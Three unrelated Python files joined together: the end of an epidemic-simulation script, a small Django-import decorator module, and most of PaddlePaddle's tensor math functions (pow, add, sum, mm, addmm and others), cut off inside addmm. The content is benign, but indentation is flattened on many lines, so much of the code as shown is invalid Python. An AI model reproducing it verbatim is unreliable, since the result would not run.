s.infection_operator.step() # 3. HIV transmission
#post-process / clean-up
for pipe in s.pipes.values():
pipe.send("terminate")
if __name__ == '__main__':
run_single(int(sys.argv[1]))
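# Example invocation (hypothetical file name; @profile makes memory_profiler
# print a line-by-line memory report for run_single):
#
#   python memory_footprint.py 1000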
|
# -*- coding: utf-8 -*-
import functools
try:
import django
except ImportError as e:
django = None
django_import_error = e
def check_django_import():
if django is None:
raise django_import_error
class django_required(object):
    def __call__(self, func):
        @functools.wraps(func)  # preserve the wrapped method's name and docstring
        def wrapper(self, *args, **kwargs):
            check_django_import()
            return func(self, *args, **kwargs)
        return wrapper
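# A minimal usage sketch (hypothetical class; only django_required and
# check_django_import above are real):
#
#   class TemplateBackend(object):
#       @django_required()
#       def render(self, source):
#           from django.template import engines
#           return engines['django'].from_string(source).render()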
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
math functions
"""
from __future__ import print_function
import numpy as np
from paddle.common_ops_import import VarDesc
from paddle.common_ops_import import dygraph_only
from paddle.common_ops_import import OpProtoHolder
from paddle.common_ops_import import templatedoc
from paddle.common_ops_import import dygraph_utils
from paddle.tensor import cast
from paddle.tensor.attribute import _complex_to_real_dtype
import paddle
from ..fluid import layers
from ..fluid.framework import core, _varbase_creator, in_dygraph_mode, Variable, convert_np_dtype_to_dtype_
from ..fluid.layer_helper import LayerHelper
from ..fluid.data_feeder import check_variable_and_dtype, check_type, check_dtype, convert_dtype
from ..fluid.layers.layer_function_generator import _generate_doc_string_, generate_activation_fn, generate_layer_fn
from ..fluid.dygraph.inplace_utils import inplace_apis_in_dygraph_only
# TODO: define math functions
# yapf: disable
from ..fluid.layers import abs # noqa: F401
from ..fluid.layers import acos # noqa: F401
from ..fluid.layers import asin # noqa: F401
from ..fluid.layers import ceil # noqa: F401
from ..fluid.layers import ceil_ # noqa: F401
from ..fluid.layers import cos # noqa: F401
from ..fluid.layers import tan # noqa: F401
from ..fluid.layers import sinh # noqa: F401
from ..fluid.layers import cosh # noqa: F401
from ..fluid.layers import exp # noqa: F401
from ..fluid.layers import exp_ # noqa: F401
from ..fluid.layers import expm1 # noqa: F401
from ..fluid.layers import floor # noqa: F401
from ..fluid.layers import floor_ # noqa: F401
from ..fluid.layers import log # noqa: F401
from ..fluid.layers import reciprocal # noqa: F401
from ..fluid.layers import reciprocal_ # noqa: F401
from ..fluid.layers import round # noqa: F401
from ..fluid.layers import round_ # noqa: F401
from ..fluid.layers import rsqrt # noqa: F401
from ..fluid.layers import rsqrt_ # noqa: F401
from ..fluid.layers import scale # noqa: F401
from ..fluid.layers import square # noqa: F401
from ..fluid.layers import stanh # noqa: F401
from ..fluid.layers import atan # noqa: F401
from ..fluid.layers import erf # noqa: F401
from ..fluid.layers import sqrt # noqa: F401
from ..fluid.layers import sqrt_ # noqa: F401
from ..fluid.layers import sin # noqa: F401
from ..fluid.layers import lgamma # noqa: F401
from ..fluid.layers import multiplex # noqa: F401
from paddle import _C_ops
__all__ = []
_supported_int_dtype_ = [
VarDesc.VarType.UINT8,
VarDesc.VarType.INT8,
VarDesc.VarType.INT16,
VarDesc.VarType.INT32,
VarDesc.VarType.INT64,
]
_supported_float_dtype_ = [
VarDesc.VarType.FP32,
VarDesc.VarType.FP64,
]
@inplace_apis_in_dygraph_only
def scale_(x, scale=1.0, bias=0.0, bias_after_scale=True, act=None, name=None):
"""
Inplace version of ``scale`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_tensor_scale`.
"""
_scale = scale.numpy().item(0) if isinstance(scale, Variable) else scale
return _C_ops.scale_(x, 'scale',
float(_scale), 'bias',
float(bias), 'bias_after_scale', bias_after_scale)
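# A minimal dygraph usage sketch for ``scale_`` above (illustrative values; with
# bias_after_scale=True the in-place result is scale * x + bias):
#
#   x = paddle.to_tensor([1.0, 2.0, 3.0])
#   scale_(x, scale=2.0, bias=1.0)  # x becomes [3., 5., 7.]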
def pow(x, y, name=None):
"""
Compute the power of tensor elements. The equation is:
.. math::
out = x^{y}
**Note**:
    ``paddle.pow`` supports broadcasting. If you want to know more about broadcasting, please refer to :ref:`user_guide_broadcasting` .
Args:
x (Tensor): An N-D Tensor, the data type is float32, float64, int32 or int64.
y (float|int|Tensor): If it is an N-D Tensor, its data type should be the same as `x`.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
N-D Tensor. A location into which the result is stored. Its dimension and data type are the same as `x`.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([1, 2, 3], dtype='float32')
# example 1: y is a float or int
res = paddle.pow(x, 2)
print(res)
# Tensor(shape=[3], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [1., 4., 9.])
res = paddle.pow(x, 2.5)
print(res)
# Tensor(shape=[3], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [1. , 5.65685415 , 15.58845711])
# example 2: y is a Tensor
y = paddle.to_tensor([2], dtype='float32')
res = paddle.pow(x, y)
print(res)
# Tensor(shape=[3], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [1., 4., 9.])
"""
# in dynamic graph mode
if in_dygraph_mode():
if isinstance(y, (int, float)):
return _C_ops.pow(x, 'factor', y)
elif isinstance(y, (paddle.Tensor, Variable)):
return _elementwise_op_in_dygraph(
x, y, axis=-1, act=None, op_name='elementwise_pow')
else:
            raise TypeError('y must be scalar or tensor type, but received: %s ' % (type(y)))
# in static graph mode
else:
if isinstance(y, (int, float)):
helper = LayerHelper('pow', **locals())
inputs = {'X': x}
attrs = {'factor': y}
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='pow', inputs=inputs, outputs={'Out': out}, attrs=attrs)
return out
        elif isinstance(y, (paddle.Tensor, Variable)):
            # TODO A potential speed improvement is supporting different types in C++ and removing the cast ops here
            return _elementwise_op(LayerHelper('elementwise_pow', **locals()))
else:
raise TypeError('y must be scalar or tensor type, but received: %s '% (type(y)))
@dygraph_only
def _elementwise_op_in_dygraph(x,
y,
axis=-1,
act=None,
use_mkldnn=False,
op_name=None):
op = getattr(_C_ops, op_name)
out = op(x, y, 'axis', axis, 'use_mkldnn', use_mkldnn)
return dygraph_utils._append_activation_in_dygraph(
out, act, use_mkldnn=use_mkldnn)
def _elementwise_op(helper):
op_type = helper.layer_type
original_op_type = helper.kwargs.get('original_op_type', op_type)
x = helper.kwargs.get('x', None)
y = helper.kwargs.get('y', None)
out = helper.kwargs.get('out', None)
assert x is not None, 'x cannot be None in {}'.format(original_op_type)
assert y is not None, 'y cannot be None in {}'.format(original_op_type)
check_variable_and_dtype(
x, 'x', ['float16', 'float32', 'float64', 'int32', 'int64', 'bool'],
original_op_type)
check_variable_and_dtype(
y, 'y', ['float16', 'float32', 'float64', 'int32', 'int64', 'bool'],
original_op_type)
axis = helper.kwargs.get('axis', -1)
use_mkldnn = helper.kwargs.get('use_mkldnn', False)
name = helper.kwargs.get('name', None)
if out is None:
if name is None:
out = helper.create_variable_for_type_inference(dtype=x.dtype)
else:
out = helper.create_variable(name=name, dtype=x.dtype, persistable=False)
helper.append_op(
type=op_type,
inputs={'X': x,
'Y': y},
outputs={'Out': out},
attrs={'axis': axis,
'use_mkldnn': use_mkldnn})
return helper.append_activation(out)
def add(x, y, name=None):
"""
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([2, 3, 4], 'float64')
y = paddle.to_tensor([1, 5, 2], 'float64')
z = paddle.add(x, y)
print(z) # [3., 8., 6. ]
"""
if in_dygraph_mode():
return _C_ops.elementwise_add(x, y)
return _elementwise_op(LayerHelper('elementwise_add', **locals()))
@inplace_apis_in_dygraph_only
def add_(x, y, name=None):
"""
Inplace version of ``add`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_tensor_add`.
"""
op_type = 'elementwise_add_'
axis = -1
out_shape = broadcast_shape(x.shape, y.shape)
if out_shape != x.shape:
raise ValueError("The shape of broadcast output {} is different from that of inplace tensor {} in the Inplace operation.".format(out_shape, x.shape))
out = _elementwise_op_in_dygraph(
x, y, axis=axis, op_name=op_type)
return out
def subtract(x, y, name=None):
"""
    Subtract two tensors element-wise. The equation is:
.. math::
out = x - y
**Note**:
    ``paddle.subtract`` supports broadcasting. If you want to know more about broadcasting, please refer to :ref:`user_guide_broadcasting` .
Args:
        x (Tensor): the input tensor, its data type should be float32, float64, int32, int64.
        y (Tensor): the input tensor, its data type should be float32, float64, int32, int64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
N-D Tensor. A location into which the result is stored. If x, y have different shapes and are "broadcastable", the resulting tensor shape is the shape of x and y after broadcasting. If x, y have the same shape, its shape is the same as x and y.
Examples:
.. code-block:: python
import numpy as np
import paddle
x = paddle.to_tensor([[1, 2], [7, 8]])
y = paddle.to_tensor([[5, 6], [3, 4]])
res = paddle.subtract(x, y)
print(res)
# [[-4, -4],
# [4, 4]]
x = paddle.to_tensor([[[1, 2, 3], [1, 2, 3]]])
y = paddle.to_tensor([1, 0, 4])
res = paddle.subtract(x, y)
print(res)
# [[[ 0, 2, -1],
# [ 0, 2, -1]]]
x = paddle.to_tensor([2, np.nan, 5], dtype='float32')
y = paddle.to_tensor([1, 4, np.nan], dtype='float32')
res = paddle.subtract(x, y)
print(res)
# [ 1., nan, nan]
x = paddle.to_tensor([5, np.inf, -np.inf], dtype='float64')
y = paddle.to_tensor([1, 4, 5], dtype='float64')
res = paddle.subtract(x, y)
print(res)
# [ 4., inf., -inf.]
"""
op_type = 'elementwise_sub'
axis = -1
act = None
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name=op_type)
return _elementwise_op(LayerHelper(op_type, **locals()))
@inplace_apis_in_dygraph_only
def subtract_(x, y, name=None):
"""
Inplace version of ``subtract`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_tensor_subtract`.
"""
axis = -1
act = None
out_shape = broadcast_shape(x.shape, y.shape)
if out_shape != x.shape:
raise ValueError("The shape of broadcast output {} is different from that of inplace tensor {} in the Inplace operation.".format(out_shape, x.shape))
out = _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name='elementwise_sub_')
return out
def divide(x, y, name=None):
"""
Divide two tensors element-wise. The equation is:
.. math::
out = x / y
**Note**:
    ``paddle.divide`` supports broadcasting. If you want to know more about broadcasting, please refer to :ref:`user_guide_broadcasting` .
Args:
        x (Tensor): the input tensor, its data type should be float32, float64, int32, int64.
        y (Tensor): the input tensor, its data type should be float32, float64, int32, int64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
N-D Tensor. A location into which the result is stored. If x, y have different shapes and are "broadcastable", the resulting tensor shape is the shape of x and y after broadcasting. If x, y have the same shape, its shape is the same as x and y.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([2, 3, 4], dtype='float64')
y = paddle.to_tensor([1, 5, 2], dtype='float64')
z = paddle.divide(x, y)
print(z) # [2., 0.6, 2.]
"""
op_type = 'elementwise_div'
axis = -1
act = None
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name=op_type)
return _elementwise_op(LayerHelper(op_type, **locals()))
def floor_divide(x, y, name=None):
"""
Floor divide two tensors element-wise. The equation is:
.. math::
out = x // y
**Note**:
    ``paddle.floor_divide`` supports broadcasting. If you want to know more about broadcasting, please refer to :ref:`user_guide_broadcasting` .
Args:
        x (Tensor): the input tensor, its data type should be int32, int64.
        y (Tensor): the input tensor, its data type should be int32, int64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
        N-D Tensor. A location into which the result is stored. Its dimension equals that of $x$.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([2, 3, 8, 7])
y = paddle.to_tensor([1, 5, 3, 3])
z = paddle.floor_divide(x, y)
print(z) # [2, 0, 2, 2]
"""
op_type = 'elementwise_floordiv'
axis = -1
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, op_name=op_type)
return _elementwise_op(LayerHelper(op_type, **locals()))
def remainder(x, y, name=None):
r"""
Mod two tensors element-wise. The equation is:
.. math::
out = x \% y
**Note**:
    ``paddle.remainder`` supports broadcasting. If you want to know more about broadcasting, please refer to :ref:`user_guide_broadcasting` .
Args:
        x (Tensor): the input tensor, its data type should be float32, float64, int32, int64.
        y (Tensor): the input tensor, its data type should be float32, float64, int32, int64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
N-D Tensor. A location into which the result is stored. If x, y have different shapes and are "broadcastable", the resulting tensor shape is the shape of x and y after broadcasting. If x, y have the same shape, its shape is the same as x and y.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([2, 3, 8, 7])
y = paddle.to_tensor([1, 5, 3, 3])
z = paddle.remainder(x, y)
print(z) # [0, 3, 2, 1]
"""
op_type = 'elementwise_mod'
axis = -1
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, op_name=op_type)
return _elementwise_op(LayerHelper(op_type, **locals()))
mod = remainder # noqa: F841
floor_mod = remainder # noqa: F841
def multiply(x, y, name=None):
"""
multiply two tensors element-wise. The equation is:
.. math::
out = x * y
**Note**:
``paddle.multiply`` supports broadcasting. If you would like to know more about broadcasting, please refer to :ref:`user_guide_broadcasting` .
Args:
x (Tensor): the input tensor, its data type should be one of float32, float64, int32, int64, bool.
y (Tensor): the input tensor, its data type should be one of float32, float64, int32, int64, bool.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
N-D Tensor. A location into which the result is stored. If x, y have different shapes and are "broadcastable", the resulting tensor shape is the shape of x and y after broadcasting. If x, y have the same shape, its shape is the same as x and y.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([[1, 2], [3, 4]])
y = paddle.to_tensor([[5, 6], [7, 8]])
res = paddle.multiply(x, y)
print(res) # [[5, 12], [21, 32]]
x = paddle.to_tensor([[[1, 2, 3], [1, 2, 3]]])
y = paddle.to_tensor([2])
res = paddle.multiply(x, y)
print(res) # [[[2, 4, 6], [2, 4, 6]]]
"""
op_type = 'elementwise_mul'
act = None
axis = -1
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name=op_type)
if x.dtype != y.dtype:
raise TypeError(
'Input tensors must be same type, but received type of x: %s, type of y: %s '
% (x.dtype, y.dtype))
return _elementwise_op(LayerHelper(op_type, **locals()))
def maximum(x, y, name=None):
"""
Compare two tensors and returns a new tensor containing the element-wise maxima. The equation is:
.. math::
out = max(x, y)
**Note**:
    ``paddle.maximum`` supports broadcasting. If you want to know more about broadcasting, please refer to :ref:`user_guide_broadcasting` .
Args:
        x (Tensor): the input tensor, its data type should be float32, float64, int32, int64.
        y (Tensor): the input tensor, its data type should be float32, float64, int32, int64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
N-D Tensor. A location into which the result is stored. If x, y have different shapes and are "broadcastable", the resulting tensor shape is the shape of x and y after broadcasting. If x, y have the same shape, its shape is the same as x and y.
Examples:
.. code-block:: python
import numpy as np
import paddle
x = paddle.to_tensor([[1, 2], [7, 8]])
y = paddle.to_tensor([[3, 4], [5, 6]])
res = paddle.maximum(x, y)
print(res)
# [[3, 4],
# [7, 8]]
x = paddle.to_tensor([[1, 2, 3], [1, 2, 3]])
y = paddle.to_tensor([3, 0, 4])
res = paddle.maximum(x, y)
print(res)
# [[3, 2, 4],
# [3, 2, 4]]
x = paddle.to_tensor([2, 3, 5], dtype='float32')
y = paddle.to_tensor([1, np.nan, np.nan], dtype='float32')
res = paddle.maximum(x, y)
print(res)
# [ 2., nan, nan]
x = paddle.to_tensor([5, 3, np.inf], dtype='float32')
y = paddle.to_tensor([1, -np.inf, 5], dtype='float32')
res = paddle.maximum(x, y)
print(res)
# [ 5., 3., inf.]
"""
op_type = 'elementwise_max'
axis = -1
act = None
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name=op_type)
return _elementwise_op(LayerHelper(op_type, **locals()))
def minimum(x, y, name=None):
"""
Compare two tensors and returns a new tensor containing the element-wise minima. The equation is:
.. math::
out = min(x, y)
**Note**:
    ``paddle.minimum`` supports broadcasting. If you want to know more about broadcasting, please refer to :ref:`user_guide_broadcasting` .
Args:
        x (Tensor): the input tensor, its data type should be float32, float64, int32, int64.
        y (Tensor): the input tensor, its data type should be float32, float64, int32, int64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
N-D Tensor. A location into which the result is stored. If x, y have different shapes and are "broadcastable", the resulting tensor shape is the shape of x and y after broadcasting. If x, y have the same shape, its shape is the same as x and y.
Examples:
.. code-block:: python
import numpy as np
import paddle
x = paddle.to_tensor([[1, 2], [7, 8]])
y = paddle.to_tensor([[3, 4], [5, 6]])
res = paddle.minimum(x, y)
print(res)
# [[1, 2],
# [5, 6]]
x = paddle.to_tensor([[[1, 2, 3], [1, 2, 3]]])
y = paddle.to_tensor([3, 0, 4])
res = paddle.minimum(x, y)
print(res)
# [[[1, 0, 3],
# [1, 0, 3]]]
x = paddle.to_tensor([2, 3, 5], dtype='float32')
y = paddle.to_tensor([1, np.nan, np.nan], dtype='float32')
res = paddle.minimum(x, y)
print(res)
# [ 1., nan, nan]
x = paddle.to_tensor([5, 3, np.inf], dtype='float64')
y = paddle.to_tensor([1, -np.inf, 5], dtype='float64')
res = paddle.minimum(x, y)
print(res)
# [ 1., -inf., 5.]
"""
op_type = 'elementwise_min'
axis = -1
act = None
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name=op_type)
return _elementwise_op(LayerHelper(op_type, **locals()))
for func in [
add,
multiply
]:
proto_dict = {'add': 'elementwise_add', 'multiply': 'elementwise_mul'}
op_proto = OpProtoHolder.instance().get_op_proto(proto_dict[func.__name__])
additional_args_lines = [
"name (string, optional): Name of the output. \
Default is None. It's used to print debug info for developers. Details: \
:ref:`api_guide_Name` "
]
func.__doc__ = _generate_doc_string_(
op_proto,
additional_args_lines=additional_args_lines,
skip_attrs_set={"x_data_format", "y_data_format", "axis",
"use_quantizer", "mkldnn_data_type", "Scale_x", "Scale_y", "Scale_out"
}) + """\n""" + str(func.__doc__)
def sum(x, axis=None, dtype=None, keepdim=False, name=None):
"""
Computes the sum of tensor elements over the given dimension.
Args:
x (Tensor): An N-D Tensor, the data type is bool, float16, float32, float64, int32 or int64.
axis (int|list|tuple, optional): The dimensions along which the sum is performed. If
:attr:`None`, sum all elements of :attr:`x` and return a
Tensor with a single element, otherwise must be in the
range :math:`[-rank(x), rank(x))`. If :math:`axis[i] < 0`,
the dimension to reduce is :math:`rank + axis[i]`.
dtype (str, optional): The dtype of output Tensor. The default value is None, the dtype
of output is the same as input Tensor `x`.
        keepdim (bool, optional): Whether to reserve the reduced dimension in the
            output Tensor. The result Tensor will have one fewer dimension
            than :attr:`x` unless :attr:`keepdim` is True. Default is False.
name (str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
        Tensor: Results of summation operation on the specified axis of input Tensor `x`.
            If `x.dtype` is `'bool'` or `'int32'`, the output data type is `'int64'`;
            otherwise the output data type is the same as `x`.
Raises:
TypeError: The type of :attr:`axis` must be int, list or tuple.
Examples:
.. code-block:: python
import paddle
# x is a Tensor with following elements:
# [[0.2, 0.3, 0.5, 0.9]
# [0.1, 0.2, 0.6, 0.7]]
# Each example is followed by the corresponding output tensor.
x = paddle.to_tensor([[0.2, 0.3, 0.5, 0.9],
[0.1, 0.2, 0.6, 0.7]])
out1 = paddle.sum(x) # [3.5]
out2 = paddle.sum(x, axis=0) # [0.3, 0.5, 1.1, 1.6]
out3 = paddle.sum(x, axis=-1) # [1.9, 1.6]
out4 = paddle.sum(x, axis=1, keepdim=True) # [[1.9], [1.6]]
# y is a Tensor with shape [2, 2, 2] and elements as below:
# [[[1, 2], [3, 4]],
# [[5, 6], [7, 8]]]
# Each example is followed by the corresponding output tensor.
y = paddle.to_tensor([[[1, 2], [3, 4]],
[[5, 6], [7, 8]]])
out5 = paddle.sum(y, axis=[1, 2]) # [10, 26]
out6 = paddle.sum(y, axis=[0, 1]) # [16, 20]
# x is a Tensor with following elements:
# [[True, True, True, True]
# [False, False, False, False]]
# Each example is followed by the corresponding output tensor.
x = paddle.to_tensor([[True, True, True, True],
[False, False, False, False]])
out7 = paddle.sum(x) # [4]
out8 = paddle.sum(x, axis=0) # [1, 1, 1, 1]
out9 = paddle.sum(x, axis=1) # [4, 0]
"""
    if axis is not None and not isinstance(axis, (list, tuple)):
        axis = [axis]
    if not axis:
        reduce_all_flag = True
    else:
        reduce_all_flag = len(axis) == len(x.shape)
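    # Resolve the output dtype: an explicit `dtype` wins; otherwise bool/int32/
    # int64 inputs are accumulated as int64 (see the Returns note above). The
    # flag reports whether an explicit out_dtype attribute must be set on the op.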
def get_dtype(x, dtype):
if dtype is not None:
return (True, dtype)
src_type = convert_dtype(x.dtype)
if src_type in ['bool','int32', 'int64']:
return (True, 'int64')
return (False, src_type)
dtype_flag, dtype = get_dtype(x, dtype)
if in_dygraph_mode():
        axis = axis if axis is not None and axis != [] else [0]
if dtype_flag:
return _C_ops.reduce_sum(x, 'dim', axis, 'keep_dim', keepdim,
'reduce_all', reduce_all_flag, 'in_dtype',
x.dtype, 'out_dtype',
convert_np_dtype_to_dtype_(dtype))
else:
return _C_ops.reduce_sum(x, 'dim', axis, 'keep_dim', keepdim,
'reduce_all', reduce_all_flag)
attrs = {
        'dim': axis if axis is not None and axis != [] and axis != () else [0],
'keep_dim': keepdim,
'reduce_all': reduce_all_flag
}
if dtype_flag:
attrs.update({
'in_dtype': x.dtype,
'out_dtype': convert_np_dtype_to_dtype_(dtype)
})
    check_variable_and_dtype(
        x, 'x', ['bool', 'float16', 'float32', 'float64',
                 'int32', 'int64', 'complex64', 'complex128'], 'sum')
check_type(axis, 'axis', (int, list, tuple, type(None)), 'sum')
helper = LayerHelper('sum', **locals())
if dtype_flag:
out = helper.create_variable_for_type_inference(
dtype=convert_np_dtype_to_dtype_(dtype))
else:
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='reduce_sum',
inputs={'X': x},
outputs={'Out': out},
attrs=attrs)
return out
@templatedoc(op_type="sum")
def add_n(inputs, name=None):
"""
This OP is used to sum one or more Tensor of the input.
For example:
.. code-block:: text
Case 1:
Input:
input.shape = [2, 3]
input = [[1, 2, 3],
[4, 5, 6]]
Output:
output.shape = [2, 3]
output = [[1, 2, 3],
[4, 5, 6]]
Case 2:
Input:
First input:
input1.shape = [2, 3]
Input1 = [[1, 2, 3],
[4, 5, 6]]
The second input:
input2.shape = [2, 3]
input2 = [[7, 8, 9],
[10, 11, 12]]
Output:
output.shape = [2, 3]
output = [[8, 10, 12],
[14, 16, 18]]
Args:
inputs (Tensor|list[Tensor]|tuple[Tensor]): A Tensor or a list/tuple of Tensors. The shape and data type of the list/tuple elements should be consistent.
Input can be multi-dimensional Tensor, and data types can be: float32, float64, int32, int64.
name(str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Tensor, the sum of input :math:`inputs` , its shape and data types are consistent with :math:`inputs`.
Examples:
.. code-block:: python
import paddle
input0 = paddle.to_tensor([[1, 2, 3], [4, 5, 6]], dtype='float32')
input1 = paddle.to_tensor([[7, 8, 9], [10, 11, 12]], dtype='float32')
output = paddle.add_n([input0, input1])
# [[8., 10., 12.],
# [14., 16., 18.]]
"""
if in_dygraph_mode():
if isinstance(inputs, Variable):
inputs = [inputs]
return _C_ops.sum(inputs, 'use_mkldnn', False)
helper = LayerHelper('add_n', **locals())
check_type(inputs, 'inputs', (Variable, tuple, list), 'add_n')
if isinstance(inputs, list) or isinstance(inputs, tuple):
if len(inputs) > 0:
for input in inputs:
check_variable_and_dtype(input, "inputs", \
['float32', 'float64', 'int32', 'int64'], 'add_n')
else:
check_variable_and_dtype(inputs, "inputs", \
['float32', 'float64', 'int32', 'int64'], 'add_n')
out = helper.create_variable_for_type_inference(
dtype=helper.input_dtype('inputs'))
helper.append_op(
type='sum',
inputs={'X': inputs},
outputs={'Out': out},
attrs={'use_mkldnn': False})
return out
def trunc(input, name=None):
'''
    This API returns a new tensor with the truncated integer values of the input.
Args:
input (Tensor): The input tensor, it's data type should be int32, int64, float32, float64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
Tensor: The output Tensor of trunc.
Examples:
.. code-block:: python
import paddle
input = paddle.rand([2,2],'float32')
print(input)
# Tensor(shape=[2, 2], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [[0.02331470, 0.42374918],
# [0.79647720, 0.74970269]])
output = paddle.trunc(input)
print(output)
# Tensor(shape=[2, 2], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [[0., 0.],
            #  [0., 0.]])
'''
if in_dygraph_mode():
return _C_ops.trunc(input)
else:
inputs = {"X": input}
attrs = {}
helper = LayerHelper("trunc", **locals())
check_variable_and_dtype(input, 'X', ['int32', 'int64', 'float32', 'float64'], 'trunc')
out = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type="trunc", inputs=inputs, attrs=attrs, outputs={"Out": out})
return out
def mm(input, mat2, name=None):
"""
Applies matrix multiplication to two tensors.
    Currently, the input tensors can be of any rank, but when the rank of
    either input is larger than 3, the two inputs must have the same rank.
    Also note that if the raw tensor :math:`input` or :math:`mat2` is rank-1 and
    non-transposed, the prepended or appended dimension :math:`1` will be
    removed after matrix multiplication.
Args:
        input (Tensor): The first input Tensor for matrix multiplication.
        mat2 (Tensor): The second input Tensor for matrix multiplication.
name(str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Tensor: The product Tensor.
Examples:
.. code-block:: python
import paddle
input = paddle.arange(1, 7).reshape((3, 2)).astype('float32')
mat2 = paddle.arange(1, 9).reshape((2, 4)).astype('float32')
out = paddle.mm(input, mat2)
print(out)
# [[11., 14., 17., 20.],
# [23., 30., 37., 44.],
            #  [35., 46., 57., 68.]]
"""
if in_dygraph_mode():
return _C_ops.matmul_v2(input, mat2)
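    # Static-graph path: validate dtypes and make sure the two innermost
    # dimensions are compatible for matrix multiplication.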
def __check_input(x, y):
var_names = {'x': x, 'y': y}
for name, val in var_names.items():
check_variable_and_dtype(val, name,
['float16', 'float32', 'float64'], 'mm')
x_shape = list(x.shape)
y_shape = list(y.shape)
if len(x_shape) == 1:
x_shape = [1] + x_shape
if len(y_shape) == 1:
y_shape = y_shape + [1]
# check the inner 2 dimensions
if x_shape[-1] != y_shape[-2]:
if not ((x_shape[-1] == -1) or (y_shape[-2] == -1)):
raise ValueError(
"After performing an optional transpose, Input X's width should be "
"equal to Y's width for multiplication "
"prerequisites. But received X's shape: %s, Y's shape: %s\n"
% (x_shape, y_shape))
if len(y_shape) > 2 and len(x_shape) > 2:
for i, dim_x in enumerate(x_shape[:-2]):
# don't check neg shape
if dim_x < 0 or y_shape[i] < 0:
continue
if dim_x != y_shape[i]:
raise ValueError(
"When the matrix is larger than 2 dimensions, the higher "
"dimensional values of the two matrices need to be equal. "
"But received x_shape[%d] != y_shape[%d]. X's shape: %s, "
"Y's shape: %s.\n" % (i, i, x_shape, y_shape))
__check_input(input, mat2)
helper = LayerHelper('mm', **locals())
out = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type='matmul_v2', inputs={'X': input,
'Y': mat2}, outputs={'Out': out})
return out
def addmm(input, x, y, beta=1.0, alpha=1.0, name=None):
"""
**addmm**
This operator is used to perform matrix multiplication for input $x$ and $y$.
$input$ is added to the final result.
The equation is:
.. math::
Out = alpha * x * y + beta * input
$Input$, $x$ and $y$ can carry the LoD (Level of Details) information, or not. But the output only shares the LoD information with input $input$.
Args:
input (Tensor): The input Tensor to be added to the final result.
x (Tensor): The first input Tensor for matrix multiplication.
y (Tensor): The second input Tensor for matrix multiplication.
beta (float): Coefficient of $input$.
alpha (float): Coefficient of $x*y$.
name (str, optional): Name of the output. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`. Default is None.
Returns:
Tensor: The output Tensor of addmm op.
Examples:
.. code-block:: python
import paddle
x = paddle.ones([2,2])
y = paddle.ones([2,2])
input = paddle.ones([2,2])
out = paddle.addmm( input=input, x=x, y=y, beta=0.5, alpha=5.0 )
print(out)
# [[10.5 10.5]
# [10.5 10.5]]
"""
input_shape = input.shape
x_shape = x.shape
y_shape = y.shape
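    # All three operands must be 2-D, and `input` must be broadcastable to
    # the shape of the x @ y product.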
    if not len(input_shape) == len(x_shape) == len(y_shape) == 2:
        raise ValueError(
            "The dimension of input, x, y should be 2 but received input's shape: {}, x's shape: {}, y's shape: {}".
            format(input_shape, x_shape, y_shape))
    if input_shape[0] != x_shape[0] and input_shape[0] != 1:
        raise ValueError(
            "When x's dimension[0] is not equal to input's dimension[0], input's dimension[0] must be 1 but got {}".
            format(input_shape[0]))
    if input_shape[1] != y_shape[1] and input_shape[1] != 1:
        raise ValueError(
            "When y's dimension[1] is not equal to input's dimension[1], input's dimension[1] must be 1 but got {}".
